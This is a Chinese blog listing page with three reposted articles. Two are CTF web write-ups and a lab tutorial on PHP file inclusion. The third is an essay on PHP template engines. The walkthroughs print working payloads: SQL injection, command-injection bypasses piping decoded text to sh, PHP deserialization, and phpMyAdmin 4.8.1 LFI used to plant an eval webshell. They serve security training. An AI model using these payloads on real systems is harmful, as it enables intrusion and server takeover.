前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[PHP代码]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点:phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话,empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入:1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 (为2) 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名) 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
转载文章
...相应内容。 为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不影响其他功能的执行,比如这里的nf和123的输出。那么就表明include函数,如果出现错误的话,并不会影响其他功能的运行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,影响后面功能的执行,比如这里的nf的输出,后面的功能因为2.txt报错,导致123未执行。那么就表明require函数,如果出现错误的话,会影响后面功能的运行。 只要文件内是php代码,文件包含是不在意文件后缀的。 12345.jpg的传参值是a,那么我们可以写传参值=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’) 然后生成一个新的php文件 访问index.php 以上我们接触的全部是本地文件包含 说了本地文件包含,我们再来看远程文件包含 简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。 要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启) 来我们可以来实验一下,把这个配置打开。 “其他选项菜单”——“打开配置文件”——“php-ini” 打开配置文件,搜索allow_url_include 把Off改为On,注:第一个字母要为大写 之后要重启才能生效。 配置开启后,我们来远程文件包含一下,我们来远程包含一下kali上的1.txt,可以看到没有本地包含,所以直接显示的内容。 那我们现在来远程包含一下kali的这个1.txt,看会不会有phpinfo,注意我这里是index文件哦,所以是默认的。 可以看到,包含成功! 这里可以插一句题外话,如果是window服务器的话,可以让本地文件包含变成远程文件包含。需要开始XX配置,SMB服务。 这里我们可以发现,进入一个不存在的目录,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。 但是php是非常严格的,进入一个不存在的目录,这里目录的名字里不能有?号,否则报错,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。 实战 注意,这里php版本过低,会安装不上 安装好后,我们来解析下源码 1.txt内容phpinfo() 来本地文件包含一下,发现成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../11.txt 靶场 http://59.63.200.79:8010/lfi/phpmyadmin/ 先创建一个库名:nf 接着创建表:ff,字段数选2个就行了 然后选中我们之前创建好的库名和表名,开始写入数据,第一个就写个一句话木马,第二个随便填充。 然后我们找到存放表的路径。 这里我们要传参2个,那么就加上&这里我们找到之后传参phpinfo http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=phpinfo(); 因为a在ff.frm里 <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 文件包含成功 用file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 写入成功后,我们连接这个8.php的木马。 http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/8.php 在线测试时这样,但是我在本地测试的时候,还是有点不一样的。我就直接上不一样的地方,前面的地方都是一样的 1,创建一个库为yingqian1984, 2,创建一个表为yq1984 3,填充表数据,因为跟上面一样,2个字段一个木马,一个随便数据 4,找数据表的位置,最后我发现我的MySQL存放数据库的地方是在 C:\ProgramData\MySQL\MySQL Server 5.7\Data\yingqian1984 文件包含成功。 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=phpinfo(); 用file_put_contents(‘9.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=file_put_contents(‘9.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 传参成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/9.php?a=phpinfo(); 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_45300786/article/details/108724251。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-01-06 09:10:40
343
转载
转载文章
...iscuz!开发组为PHPChina的《PHPer》写的稿,一直也没有发到blog上了,今天偶然之间记起,顺手转发过来。 一、关于模板引擎的前言 从phplib到smarty,再到Discuz!的模板机制,本文试图通过PHP模板引擎为你讲解作者自己的PHP心得。 我清楚的记得在我刚上大学开始学习PHP的时候,曾经在phpe.net看到过一篇关于phplib Template和FastTemplate这两模板引擎性能比较的文章。让我在接下来半年的时间内持续的使用着phplib。不可否认phplib是左右了一代PHP开发人员对于PHP模板引擎的认识。或许你也会对下面的方法比较熟悉$t->set_file $t->set_var 当我对于phplib的执行效率不满意的时候,我开始寻找下一个PHP的模板引擎,于是smarty跳入我的视野范围,当我费尽心血去学会了smarty并使用开发了很多东西,而现在的我突然发现记得的也就只有下面的方法了$s->assign $s->display 究竟我们需要模板引擎来做什么呢,MVC?简单?易用?效率?请看下文的分析。 二、程序处理的分析 1.PHPLIB的程序处理过程 从phplib的处理开始讲起$t = new Template() $t->set_file $t->set_var $t->parse $t->p 看上面的代码,翻译成中文就是初始化模板类$t 设置模板文件 设置模板变量 分析模板文件中的模板变量 输出内容 通过了最少5个步骤在php程序中实现模板的处理 2.Smarty的程序处理过程 现在来看smarty的处理$s = new Smarty $s->assign $s->display 翻译成中文就是初始化模板类$s 设置模板变量 解析并输出模板 3.Discuz!模板的程序处理过程include template(tplname); 主要作用就是指定给程序需要处理的模板文件 在上述三种模板处理机制中,最容易理解和接受就是Discuz!模板的处理过程。初始化、设置变量、解析模板、输出内容,Discuz!只用了一个函数来做。对于一个开源的论坛软件,这样处理的好处是显而易见的,对于Discuz!进行二次开发的程序员的要求降低。简化模板语言,方便风格和插件的制作,这也在一定程度上促进了Discuz!的传播 三、模板源文件的语法 在phplib中处理循环嵌套的时候,使用: {it} 在smarty中处理循环嵌套的时候,引入了< {section name=loopName loop=$loopArray}>(当然还有foreach这样的) 在Discuz!中处理循环嵌套的时候, 其实真正的模板面对的可以说是不懂PHP或者懂一点PHP的美工同志们,模板的复杂就意味着美工制作页面的难度加大。在必不可少的需要模板有逻辑处理的时候,为什么不在html代码中使用原生态的PHP语法,而让美工相当于去学习另外一种语言呢?在我个人的经验中,显然是Discuz!的模板语言更为简单易学,也为我节省了更多的时间。 四、Discuz!模板处理机制 我剥离出一个简单的Discuz!模板处理函数function template($file, $templateid = 0, $tpldir = '') { $tplfile = DISCUZ_ROOT.'./'.$tpldir.'/'.$file.'.htm';//模板源文件,此处$tplfile变量的值可能是D:\discuz\templates\default\demo.htm $objfile = DISCUZ_ROOT.'./forumdata/templates/'. $templateid.'_'.$file.'.tpl.php';//模板缓存文件,此处$objfile变量的值可能是D:\discuz\forumdata\templates\1_demo.tpl.php //如果模板源文件的修改时间迟于模板缓存文件的修改时间, //就是模板源文件被修改而模板缓存没有更新的时候, //则调用parse_template函数重新生成模板缓存文件。 if(@filemtime($tplfile) > @filemtime($objfile)) { require_once DISCUZ_ROOT.'./include/template.func.php'; parse_template($file, $templateid, $tpldir); } //返回缓存文件名称 //$objfile变量内容可能为D:\discuz\forumdata\templates\1_demo.tpl.php return $objfile; } 而php页面的模板执行语句include template('demo'); 实际上在本例中就是相当于include 'D:\discuz\forumdata\templates\1_demo.tpl.php'; 这个流程就是一个demo.php文件中当数据处理完成以后include template('demo'),去显示页面。 五、总结 我也曾经看到过有列举出很多种的PHP模板引擎,但是我觉着phplib、smarty、Discuz!模板机制就足以说明问题了。 1.我们需要模板来做什么? 分离程序与界面,为程序开发以及后期维护提供方便。 2.我们还在关心什么? PHP模板引擎的效率,易用性,可维护性。 3.最后的要求什么? 简单就是美! 我的文章好像没有写完,其实已经写完了,我要说明的就是从PHP的模板引擎看Discuz!模板机制。分析已经完成,或许以后我会再写篇实际数据的测试供给大家参考! Tags: none 版权声明:原创作品,欢迎转载,转载时请务必以超链接形式标明文章原始地址、作者信息和本声明。 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_42557656/article/details/115159292。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-07 14:43:46
108
转载
转载文章
